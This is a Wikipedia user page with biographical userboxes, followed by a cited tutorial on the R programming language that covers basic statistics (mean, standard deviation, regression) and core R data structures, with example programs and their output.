User:TimHowardRiley

{{RainbowBar|7}}

Contributing editor, database programmer, and musician

style="margin: 1em auto 1em auto"

| {{User degree/BSc subject | Computer Science}} {{userbox|gold|white|45px| This user graduated magna cum laude from Florida International University.}}

{{userbox|green|white|45px| This user has a Business Administration (Accountancy) degree from California State University, Sacramento.}} {{userbox|border=1|border-color=#000000|#CCCC99|#CCCC99|65px| This user is writing a [https://appahost.com/predictive_algorithms.pdf book].}}
{{User Software Engineer}}

{{user c-5}}

{{userbox|border=1|border-color=#000000|#ffc6a5|#ffc6a5|80px| This user programmed the research databases at the Everglades National Park.}}

{{userbox|border=1|border-color=#000000|#ffc6a5|#ffc6a5|94px| This user used to commute daily to [http://timriley.net/redirects/commute.html here].}}

{{userbox|border=1|border-color=#ff8800|#c6daf7|#c6daf7|60px| This user's first computer was a TRS-80 Model I.}} {{User:Blast san/userboxes/User website here|appahost.com}}
{{user mysql}}

{{User linux}}

{{userbox|border=1|border-color=#ff8800|#c6daf7|#c6daf7|50px| This user misses his 1966 Ford Mustang Convertible.}} {{userbox|border=1|border-color=#000000|#e7f784|#e7f784|65px| This user just LOVES to cycle here.}}
{{user trombone}}

{{userbox|border=1|border-color=#000000|lightblue|lightblue|42px| This user served in the Army Band at Fort Benning.}}

{{userbox|border=1|border-color=#000000|white|white|80px| This user believes Be Afraid is an unfortunate reality. "You should also learn that Wikipedia users often display ownership of articles they've edited."}}

R programming language

= Examples =

== Mean -- a measure of center ==

A numeric data set may have a central tendency — where some of the most typical data points reside.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 90

| isbn = 0-201-71058-7

}} The arithmetic mean (average) is the most commonly used measure of central tendency. The mean of a numeric data set is the sum of the data points divided by the number of data points.

:Let x = a list of data points.

:Let n = the number of data points.

:Let \bar{x} = the mean of a data set.

:\bar{x} = \frac{x_1+x_2+\cdots +x_n}{n}

Suppose a sample of four Celsius temperature measurements was taken, with the observations 12 hours apart.

:Let x = a list of degrees Celsius data points of 30, 27, 31, 28.

This R computer program will output the mean of x:

# The c() function "combines" a list into a single object.

x <- c( 30, 27, 31, 28 )

sum <- sum( x )

length <- length( x )

mean <- sum / length

message( "Mean:" )

print( mean )

Note: R allows the same identifier to name both a function and a data object, so assigning to sum does not prevent a later call to sum(). For more information, see scope.

Output:

Mean:

[1] 29

This R program will execute the native mean() function to output the mean of x:

x <- c( 30, 27, 31, 28 )

message( "Mean:" )

print( mean( x ) )

Output:

Mean:

[1] 29

== Standard deviation -- a measure of dispersion ==

A standard deviation of a numeric data set is an indication of the average distance all the data points are from the mean.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 105

| isbn = 0-201-71058-7

}} For a data set with a small amount of variation, each data point will be close to the mean, so the standard deviation will be small.

:Let x = a list of data points.

:Let n = the number of data points.

:Let s = the standard deviation of a data set.

:s = \sqrt{\frac{\sum\left(x_i - \bar{x}\right)^2}{n - 1}}

Suppose a sample of four Celsius temperature measurements was taken, with the observations 12 hours apart.

:Let x = a list of degrees Celsius data points of 30, 27, 31, 28.

This R program will output the standard deviation of x:

x <- c( 30, 27, 31, 28 )

distanceFromMean <- x - mean( x )

distanceFromMeanSquared <- distanceFromMean ** 2

distanceFromMeanSquaredSum <- sum( distanceFromMeanSquared )

variance <- distanceFromMeanSquaredSum / ( length( x ) - 1 )

standardDeviation <- sqrt( variance )

message( "Standard deviation:" )

print( standardDeviation )

Output:

Standard deviation:

[1] 1.825742

This R program will execute the native sd() function to output the standard deviation of x:

x <- c( 30, 27, 31, 28 )

message( "Standard deviation:" )

print( sd( x ) )

Output:

Standard deviation:

[1] 1.825742
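As a quick cross-check, the standard deviation is the square root of the sample variance. The following is a minimal sketch using the same data and the native var() function; the object name sampleVariance is chosen only for illustration:

```r
x <- c( 30, 27, 31, 28 )

# var() divides by n - 1, matching the denominator in the formula for s
sampleVariance <- var( x )

# all.equal() compares two numbers with a small numeric tolerance
print( all.equal( sqrt( sampleVariance ), sd( x ) ) )
```

The comparison should print TRUE, because sd() is defined as the square root of var().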

== Linear regression -- a measure of relation ==

[[File:Linear least squares example2.svg|thumb|A scatter plot resembling a linear relationship has infinitely many{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 155

| isbn = 0-201-71058-7

}} straight lines that will pass close to all the data points (depicted in red). The blue regression line (generally called curve fit) is the one straight line that has the minimum average distance (depicted in green) from all the points to the line.]]

A phenomenon may be the result of one or more observable events. For example, the phenomenon of skiing accidents may be the result of having snow in the mountains. A method to measure whether or not a numeric data set is related to another data set is linear regression.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 146

| isbn = 0-201-71058-7

}}

:Let x = a data set of independent data points, in which each point occurred at a specific time.

:Let y = a data set of dependent data points, in which each point occurred at the same time as an independent data point.

If a linear relationship exists, then a scatter plot of the two data sets will show a pattern that resembles a straight line.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 148

| isbn = 0-201-71058-7

}} If a straight line is embedded into the scatter plot such that the average distance from all the points to the line is minimal, then the line is called a regression line. The equation of the regression line is called the regression equation.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 156

| isbn = 0-201-71058-7

}}

The regression equation is a linear equation; therefore, it has a slope and y-intercept. The format of the regression equation is \hat{y} = b_{0} + b_{1}x.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 157

| isbn = 0-201-71058-7

}}{{efn|The format of the regression equation differs from the algebraic format of y = ax + b. The y-intercept is placed first, and all of the independent variables are appended to the right.}}

:Let b_{1} = the slope of the regression equation.

:b_{1} = \frac{\sum\left(x - \bar{x}\right)\left(y - \bar{y}\right)}{\sum\left(x - \bar{x}\right)^2}

:Let b_{0} = the y-intercept of the regression equation.

:b_{0} = \bar{y} - b_{1}\bar{x}

Suppose a sample of four Celsius temperature measurements was taken, with the observations 12 hours apart. At each observation, the thermometer was also switched to Fahrenheit and a second measurement was taken.

:Let x = a list of degrees Celsius data points of 30, 27, 31, 28.

:Let y = a list of degrees Fahrenheit data points of 86.0, 80.6, 87.8, 82.4.

This R program will output the slope and y-intercept of a linear relationship in which y depends upon x:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

# Build the numerator

independentDistanceFromMean <- x - mean( x )

sampledDependentDistanceFromMean <- y - mean( y )

independentDistanceTimesSampledDistance <-

independentDistanceFromMean *

sampledDependentDistanceFromMean

independentDistanceTimesSampledDistanceSum <-

sum( independentDistanceTimesSampledDistance )

# Build the denominator

independentDistanceFromMeanSquared <-

independentDistanceFromMean ** 2

independentDistanceFromMeanSquaredSum <-

sum( independentDistanceFromMeanSquared )

# Slope is rise over run

slope <-

independentDistanceTimesSampledDistanceSum /

independentDistanceFromMeanSquaredSum

yIntercept <- mean( y ) - slope * ( mean( x ) )

message( "Slope:" )

print( slope )

message( "Y-intercept:" )

print( yIntercept )

Output:

Slope:

[1] 1.8

Y-intercept:

[1] 32

This R program will execute the native functions to output the slope and y-intercept:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

# Execute lm() with Fahrenheit depends upon Celsius

linearModel <- lm( y ~ x )

# coefficients() returns a structure containing the slope and y intercept

coefficients <- coefficients( linearModel )

# Extract the slope from the structure

slope <- coefficients[["x"]]

# Extract the y intercept from the structure

yIntercept <- coefficients[["(Intercept)"]]

message( "Slope:" )

print( slope )

message( "Y-intercept:" )

print( yIntercept )

Output:

Slope:

[1] 1.8

Y-intercept:

[1] 32
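Once fitted, the regression equation can be used to predict a response for a new value of the independent variable. The following is a minimal sketch using the native predict() function; the value of 25 degrees Celsius and the object names newCelsius and predictedFahrenheit are assumptions made for illustration:

```r
x <- c( 30, 27, 31, 28 )
y <- c( 86.0, 80.6, 87.8, 82.4 )

linearModel <- lm( y ~ x )

# newdata must be a data frame whose column name matches the predictor (x)
newCelsius <- data.frame( x = 25 )

predictedFahrenheit <- predict( linearModel, newdata = newCelsius )

message( "Predicted Fahrenheit at 25 Celsius:" )
print( unname( predictedFahrenheit ) )
```

The result should be close to 77, which is 32 + 1.8 × 25.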

== Coefficient of determination -- a percentage of variation ==

The coefficient of determination determines the percentage of variation explained by the independent variable.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 170

| isbn = 0-201-71058-7

}} It always lies between 0 and 1.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 175

| isbn = 0-201-71058-7

| quote = The coefficient of determination always lies between 0 and 1 ...

}} A value of 0 indicates no relationship between the two data sets, and a value near 1 indicates the regression equation is extremely useful for making predictions.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 175

| isbn = 0-201-71058-7

}}

:Let \hat{y} = the data set of predicted response data points when the independent data points are passed through the regression equation.

:Let r^{2} = the coefficient of determination in a relationship between an independent variable and a dependent variable.

:r^{2} = \frac{\sum\left(\hat{y} - \bar{y}\right)^2}{\sum\left(y - \bar{y}\right)^2}

This R program will output the coefficient of determination of the linear relationship between x and y:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

# Build the numerator

linearModel <- lm( y ~ x )

coefficients <- coefficients( linearModel )

slope <- coefficients[["x"]]

yIntercept <- coefficients[["(Intercept)"]]

predictedResponse <- yIntercept + ( slope * x )

predictedResponseDistanceFromMean <-

predictedResponse - mean( y )

predictedResponseDistanceFromMeanSquared <-

predictedResponseDistanceFromMean ** 2

predictedResponseDistanceFromMeanSquaredSum <-

sum( predictedResponseDistanceFromMeanSquared )

# Build the denominator

sampledResponseDistanceFromMean <- y - mean( y )

sampledResponseDistanceFromMeanSquared <-

sampledResponseDistanceFromMean ** 2

sampledResponseDistanceFromMeanSquaredSum <-

sum( sampledResponseDistanceFromMeanSquared )

coefficientOfDetermination <-

predictedResponseDistanceFromMeanSquaredSum /

sampledResponseDistanceFromMeanSquaredSum

message( "Coefficient of determination:" )

print( coefficientOfDetermination )

Output:

Coefficient of determination:

[1] 1

This R program will execute the native functions to output the coefficient of determination:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

linearModel <- lm( y ~ x )

summary <- summary( linearModel )

coefficientOfDetermination <- summary[["r.squared"]]

message( "Coefficient of determination:" )

print( coefficientOfDetermination )

Output:{{efn|This may display to standard error a warning message that the summary may be unreliable. Nonetheless, the output of 1 is correct.}}

Coefficient of determination:

[1] 1
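For a regression with a single independent variable, the coefficient of determination also equals the square of the Pearson correlation coefficient. The following is a minimal sketch of that shortcut using the native cor() function; the object name correlation is chosen only for illustration:

```r
x <- c( 30, 27, 31, 28 )
y <- c( 86.0, 80.6, 87.8, 82.4 )

# cor() returns the Pearson correlation coefficient between x and y
correlation <- cor( x, y )

coefficientOfDetermination <- correlation ** 2

message( "Coefficient of determination:" )
print( coefficientOfDetermination )
```

Because the Fahrenheit values are an exact linear function of the Celsius values, the result should be 1 up to floating-point rounding.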

== Scatter plot ==

This R program will display a scatter plot with an embedded regression line and regression equation illustrating the relationship between x and y:

x <- c( 30, 27, 31, 28 )

y <- c( 86.0, 80.6, 87.8, 82.4 )

linearModel <- lm( y ~ x )

coefficients <- coefficients( linearModel )

slope <- coefficients[["x"]]

intercept <- coefficients[["(Intercept)"]]

# Execute paste() to build the regression equation string

regressionEquation <- paste( "y =", intercept, "+", slope, "x" )

# Display a scatter plot with the regression line and equation embedded

plot(

x,

y,

main = "Fahrenheit Depends Upon Celsius",

sub = regressionEquation,

xlab = "Degrees Celsius",

ylab = "Degrees Fahrenheit" )

# Draw the regression line on top of the scatter plot

abline( linearModel )

Output:

File:Regression fahrenheit depends celsius.pdf

= Programming =

R is an interpreted language, so programmers typically access it through a command-line interpreter. If a programmer types 1+1 at the R command prompt and presses enter, the computer replies with 2.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 4

| isbn = 978-1-449-35901-0

}} Programmers also save R programs to a file then execute the batch interpreter [https://linux.die.net/man/1/rscript Rscript].{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 20

| isbn = 978-1-449-35901-0

| quote=An R script is just a plain text file that you save R code in.

}}

== Object ==

R stores data inside an object. An object is assigned a name which the computer program uses to set and retrieve a value.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 7

| isbn = 978-1-449-35901-0

}} An object is created by placing its name to the left of the symbol-pair <-.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 8

| isbn = 978-1-449-35901-0

}} The symbol-pair <- is called the assignment operator.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 77

| isbn = 978-1-449-35901-0

}}

To create an object named x and assign it the integer value 82:

x <- 82L

print( x )

Output:

[1] 82

The [1] displayed before the number is a subscript. It shows the container for this integer is index one of an array.

== Vector ==

The most primitive R object is the vector.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 37

| isbn = 978-1-449-35901-0

}} A vector is a one dimensional array of data. To assign multiple elements to the array, use the c() function to "combine" the elements. The elements must be the same data type.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 38

| isbn = 978-1-449-35901-0

}} R lacks scalar data types, which are placeholders for a single word — usually an integer. Instead, a single integer is stored into the first element of an array. The single integer is retrieved using the index subscript of [1].{{efn|To retrieve the value of an array of length one, the index subscript is optional.}}

R program to store and retrieve a single integer:

store <- 82L

retrieve <- store[1]

print( retrieve[1] )

Output:

[1] 82

=== Element-wise operation ===

When an operation is applied to a vector, R will apply the operation to each element in the array. This is called an element-wise operation.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 10

| isbn = 978-1-449-35901-0

}}

This example creates the object named x and assigns it integers 1 through 3. The object is displayed and then again with one added to each element:

x <- 1:3

print( x )

print( x + 1 )

Output:

[1] 1 2 3

[1] 2 3 4

To achieve the many additions, R implements vector recycling. The numeral one following the plus sign (+) is converted into an internal array of three ones. The + operation simultaneously loops through both arrays and performs the addition on each element pair. The results are stored into another internal array of three elements which is returned to the print() function.
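Recycling also applies when both operands have more than one element. The following is a minimal sketch, with the object names long and short chosen only for illustration:

```r
long <- c( 1, 2, 3, 4 )
short <- c( 10, 20 )

# short is recycled to 10, 20, 10, 20 before the addition
print( long + short )
```

Output:

```
[1] 11 22 13 24
```

If the longer length is not a multiple of the shorter length, R still recycles but issues a warning.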

=== Numeric vector ===

A numeric vector is used to store integers and floating point numbers.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 39

| isbn = 978-1-449-35901-0

}} The primary characteristic of a numeric vector is the ability to perform arithmetic on the elements.

==== Integer vector ====

By default, integers (numbers without a decimal point) are stored as floating point. To force integer memory allocation, append an L to the number. As an exception, the sequence operator : will, by default, allocate integer memory.

R program:

x <- 82L

print( x[1] )

message( "Data type:" )

typeof( x )

Output:

[1] 82

Data type:

[1] "integer"

R program:

x <- c( 1L, 2L, 3L )

print( x )

message( "Data type:" )

typeof( x )

Output:

[1] 1 2 3

Data type:

[1] "integer"

R program:

x <- 1:3

print( x )

message( "Data type:" )

typeof( x )

Output:

[1] 1 2 3

Data type:

[1] "integer"

==== Double vector ====

A double vector stores real numbers, which are also known as floating point numbers. The memory allocation for a floating point number is double precision. Double precision is the default memory allocation for numbers with or without a decimal point.

R program:

x <- 82

print( x[1] )

message( "Data type:" )

typeof( x )

Output:

[1] 82

Data type:

[1] "double"

R program:

x <- c( 1, 2, 3 )

print( x )

message( "Data type:" )

typeof( x )

Output:

[1] 1 2 3

Data type:

[1] "double"
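Mixing the two numeric types in one expression changes the result's data type. The following is a minimal sketch, with the object name integerVector chosen only for illustration:

```r
integerVector <- 1:3

# integer + integer stays integer
print( typeof( integerVector + 1L ) )

# integer + double is promoted to double
print( typeof( integerVector + 1 ) )
```

Output:

```
[1] "integer"
[1] "double"
```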

=== Logical vector ===

A logical vector stores binary data — either TRUE or FALSE. The purpose of this vector is to store the result of a comparison.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 42

| isbn = 978-1-449-35901-0

}} A logical datum is expressed as either TRUE, T, FALSE, or F. The capital letters are required, and no quotes surround the constants.

R program:

x <- 3 < 4

print( x[1] )

message( "Data type:" )

typeof( x )

Output:

[1] TRUE

Data type:

[1] "logical"

Two vectors may be compared using the following logical operators:{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 81

| isbn = 978-1-449-35901-0

}}

{| border="1" class="wikitable"
! Operator
! Syntax
! Tests
|-
| {{mono|>}}
| {{mono|a > b}}
| Is a greater than b?
|-
| {{mono|1=>=}}
| {{mono|1=a >= b}}
| Is a greater than or equal to b?
|-
| {{mono|<}}
| {{mono|a < b}}
| Is a less than b?
|-
| {{mono|1=<=}}
| {{mono|1=a <= b}}
| Is a less than or equal to b?
|-
| {{mono|1===}}
| {{mono|1=a == b}}
| Is a equal to b?
|-
| {{mono|1=!=}}
| {{mono|1=a != b}}
| Is a not equal to b?
|}
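The comparison operators work element-wise and return a logical vector. The following is a minimal sketch; the native any() and all() functions are included to show how such a vector can be reduced to a single value:

```r
a <- c( 1, 5, 3 )
b <- c( 2, 5, 1 )

# Each element of a is compared with the element of b at the same position
print( a > b )
print( a == b )

# any() is TRUE if at least one element is TRUE; all() requires every element
print( any( a > b ) )
print( all( a >= b ) )
```

Output:

```
[1] FALSE FALSE  TRUE
[1] FALSE  TRUE FALSE
[1] TRUE
[1] FALSE
```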

=== Character vector ===

A character vector stores character strings.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 41

| isbn = 978-1-449-35901-0

}} Strings are created by surrounding text in double quotation marks.

R program:

x <- "hello world"

print( x[1] )

message( "Data type:" )

typeof( x )

Output:

[1] "hello world"

Data type:

[1] "character"

R program:

x <- c( "hello", "world" )

print( x )

message( "Data type:" )

typeof( x )

Output:

[1] "hello" "world"

Data type:

[1] "character"

=== Factor ===

A factor is a vector that stores a categorical variable.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 49

| isbn = 978-1-449-35901-0

}} The factor() function converts a text string into an enumerated type, which is stored as an integer.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 50

| isbn = 978-1-449-35901-0

}}
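The integer storage can be inspected directly. The following is a minimal sketch, with the object name waterApplied and its sample values assumed for illustration:

```r
waterApplied <- factor( c( "light", "none", "light" ),
                        levels = c( "none", "light", "medium" ) )

# as.integer() exposes the underlying integer codes
print( as.integer( waterApplied ) )

# levels() returns the text labels that the codes refer to
print( levels( waterApplied ) )
```

Output:

```
[1] 2 1 2
[1] "none"   "light"  "medium"
```

Each code is the position of the element's label within the levels vector.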

In experimental design, a factor is an independent variable to test (an input) in a controlled experiment.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 25

| isbn = 0-201-71058-7

}} A controlled experiment is used to establish causation, not just association.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 23

| isbn = 0-201-71058-7

}} For example, one could notice that an increase in hot chocolate sales is associated with an increase in skiing accidents, but that association alone does not show that one causes the other.

An experimental unit is an item that an experiment is being performed upon. If the experimental unit is a person, then it is known as a subject. A response variable (also known as a dependent variable) is a possible outcome from an experiment. A factor level is a characteristic of a factor. A treatment is an environment consisting of a combination of one level (characteristic) from each of the input factors. A replicate is the execution of a treatment on an experimental unit and yields response variables.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 24

| isbn = 0-201-71058-7

}}

This example builds two R programs to model an experiment to increase the growth of a species of cactus. Two factors are tested:

  1. water levels of none, light, or medium
  2. superabsorbent polymer levels of not used or used

R program to set up the design:

# Step 1 is to establish the levels of a factor.
# Vector of the water levels:

waterLevel <-

c(

"none",

"light",

"medium" )

# Step 2 is to create the factor.
# Vector of the water factor:

waterFactor <-

factor(

# Although a subset is possible, use all of the levels.

waterLevel,

levels = waterLevel )

# Vector of the polymer levels:

polymerLevel <-

c(

"notUsed",

"used" )

# Vector of the polymer factor:

polymerFactor <-

factor(

polymerLevel,

levels = polymerLevel )

# The treatments are the Cartesian product of both factors.

treatmentCartesianProduct <-

expand.grid(

waterFactor,

polymerFactor )

message( "Water factor:" )

print( waterFactor )

message( "\nPolymer factor:" )

print( polymerFactor )

message( "\nTreatment Cartesian product:" )

print( treatmentCartesianProduct )

Output:

Water factor:

[1] none light medium

Levels: none light medium

Polymer factor:

[1] notUsed used

Levels: notUsed used

Treatment Cartesian product:

Var1 Var2

1 none notUsed

2 light notUsed

3 medium notUsed

4 none used

5 light used

6 medium used

R program to store and display the results:

experimentalUnit <- c( "cactus1", "cactus2", "cactus3" )

replicateWater <- c( "none", "light", "medium" )

replicatePolymer <- c( "notUsed", "used", "notUsed" )

replicateInches <- c( 82L, 83L, 84L )

response <-

data.frame(

experimentalUnit,

replicateWater,

replicatePolymer,

replicateInches )

print( response )

Output:

experimentalUnit replicateWater replicatePolymer replicateInches

1 cactus1 none notUsed 82

2 cactus2 light used 83

3 cactus3 medium notUsed 84

== Data frame ==

A data frame stores a two-dimensional array.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 55

| isbn = 978-1-449-35901-0

| quote = Data frames are the two-dimensional version of a list.

}} The horizontal dimension is a list of vectors. The vertical dimension is a list of rows. It is the most useful structure for data analysis.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 55

| isbn = 978-1-449-35901-0

| quote = They are far and away the most useful storage structure for data analysis[.]

}} Data frames are created using the data.frame() function. The input is a list of vectors (of any data type). Each vector becomes a column in a table. The elements in each vector are aligned to form the rows in the table.

R program:

integer <- c( 82L, 83L )

string <- c( "hello", "world" )

data.frame <- data.frame( integer, string )

print( data.frame )

message( "Data type:" )

class( data.frame )

Output:

integer string

1 82 hello

2 83 world

Data type:

[1] "data.frame"

Data frames can be deconstructed by providing a vector's name between double square brackets. This returns the original vector. Each element in the returned vector can be accessed by its index number.

R program to extract the word "world". It is stored in the second element of the "string" vector:

integer <- c( 82L, 83L )

string <- c( "hello", "world" )

data.frame <- data.frame( integer, string )

vector <- data.frame[["string"]]

print( vector[2] )

message( "Data type:" )

typeof( vector )

Output:

[1] "world"

Data type:

[1] "character"
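A column can also be extracted with the $ operator, and the native nrow() and ncol() functions report the table's dimensions. The following is a minimal sketch, assuming R 4.0 or later (where data.frame() keeps strings as character vectors by default); the object name frame is chosen only for illustration:

```r
integer <- c( 82L, 83L )
string <- c( "hello", "world" )

frame <- data.frame( integer, string )

# The $ operator extracts a column by name
print( frame$string[2] )

# nrow() and ncol() report the number of rows and columns
print( nrow( frame ) )
print( ncol( frame ) )
```

Output:

```
[1] "world"
[1] 2
[1] 2
```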

== Vectorized coding ==

Vectorized coding is a method to produce quality R computer programs that take advantage of R's strengths.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 173

| isbn = 978-1-449-35901-0

}} The R language is designed to be fast at logical testing, subsetting, and element-wise execution. On the other hand, R does not have a fast for loop.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 185

| isbn = 978-1-449-35901-0

}} For example, R can search-and-replace faster using logical vectors than by using a for loop.

=== For loop ===

A for loop repeats a block of code for a specific number of iterations.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 165

| isbn = 978-1-449-35901-0

}}

Example to search-and-replace using a for loop:

vector <- c( "one", "two", "three" )

for ( i in 1:length( vector ) )

{

if ( vector[ i ] == "one" )

{

vector[ i ] <- "1"

}

}

message( "Replaced vector:" )

print( vector )

Output:

Replaced vector:

[1] "1" "two" "three"

=== Subsetting ===

R's syntax allows for a logical vector to be used as an index to a vector.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 69

| isbn = 978-1-449-35901-0

}} This method is called subsetting.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 80

| isbn = 978-1-449-35901-0

}}

R example:

vector <- c( "one", "two", "three" )

print( vector[ c( TRUE, FALSE, TRUE ) ] )

Output:

[1] "one" "three"

=== Change a value using an index number ===

R allows for the assignment operator <- to overwrite an existing value in a vector by using an index number.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 77

| isbn = 978-1-449-35901-0

}}

R example:

vector <- c( "one", "two", "three" )

vector[ 1 ] <- "1"

print( vector )

Output:

[1] "1" "two" "three"

=== Change a value using subsetting ===

R also allows for the assignment operator <- to overwrite an existing value in a vector by using a logical vector.

R example:

vector <- c( "one", "two", "three" )

vector[ c( TRUE, FALSE, FALSE ) ] <- "1"

print( vector )

Output:

[1] "1" "two" "three"

=== Vectorized code to search-and-replace ===

Because a logical vector may be used as an index, and because the logical operator returns a vector, a search-and-replace can take place without a for loop.

R example:

vector <- c( "one", "two", "three" )

vector[ vector == "one" ] <- "1"

print( vector )

Output:

[1] "1" "two" "three"
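The same statement replaces every match, however many there are. The following is a minimal sketch with a longer vector; the intermediate object name matches is chosen only for illustration:

```r
vector <- c( "one", "two", "one", "three", "one" )

# The comparison yields TRUE at positions 1, 3, and 5
matches <- vector == "one"
print( matches )

# A single assignment replaces every matching element
vector[ matches ] <- "1"
print( vector )
```

Output:

```
[1]  TRUE FALSE  TRUE FALSE  TRUE
[1] "1"     "two"   "1"     "three" "1"
```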

== Functions ==

A function is an object that stores computer code instead of data.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 16

| isbn = 978-1-449-35901-0

}} The purpose of storing code inside a function is to be able to reuse it in another context.
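A programmer can also store code in a new function by using the function keyword. The following is a minimal sketch; the function name celsiusToFahrenheit and its parameter name are assumptions made for illustration:

```r
# celsiusToFahrenheit is a hypothetical name chosen for this sketch
celsiusToFahrenheit <- function( celsius )
{
    # The value of the last expression is returned to the caller
    32 + 1.8 * celsius
}

# The function can be reused with a single value or with a vector
print( celsiusToFahrenheit( 30 ) )
print( celsiusToFahrenheit( c( 27, 31 ) ) )
```

The first call should print a value of 86, and the second should print values of 80.6 and 87.8, because the arithmetic is applied element-wise.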

=== Native functions ===

R comes with over 1,000 native functions to perform common tasks.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 29

| isbn = 978-1-449-35901-0

}} To execute a function:

  1. type in the function's name
  2. type in an open parenthesis (
  3. type in the data to be processed
  4. type in a close parenthesis )

This example rolls a die one time. The native function's name is sample(). The data to be processed are:

  1. a numeric integer vector from one to six
  2. the size parameter instructs sample() to execute the roll one time

sample( 1:6, size=1 )

Possible output:

[1] 6

The R interpreter provides a help screen for each native function. The help screen is displayed after typing in a question mark followed by the function's name:

?sample

Partial output:

Description:

‘sample’ takes a sample of the specified size from the elements of

‘x’ using either with or without replacement.

Usage:

sample(x, size, replace = FALSE, prob = NULL)

==== Function parameters ====

The sample() function has four input parameters. Input parameters are pieces of information that control the function's behavior. Input parameters may be communicated to the function in a combination of three ways:

  1. by position separated with commas
  2. by name separated with commas and the equal sign
  3. left empty

For example, each of these calls to sample() will roll a die one time:

sample( 1:6, 1, F, NULL )

sample( 1:6, 1 )

sample( 1:6, size=1 )

sample( size=1, x=1:6 )

Every input parameter has a name.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 13

| isbn = 978-1-449-35901-0

}} If a function has many parameters, setting name = data will make the source code more readable.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 14

| isbn = 978-1-449-35901-0

}} If the parameter's name is omitted, R will match the data in the position order. Usually, parameters that are rarely used will have a default value and may be omitted.
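The parameter names can be listed without opening the help screen. The following is a minimal sketch using the native formals() function; it also checks that the order of named parameters does not matter, with set.seed() used only to make the two rolls comparable:

```r
# formals() returns a function's parameters and their default values
parameterNames <- names( formals( sample ) )
print( parameterNames )

# Named parameters may appear in any order
set.seed( 1 )
first <- sample( x = 1:6, size = 1 )

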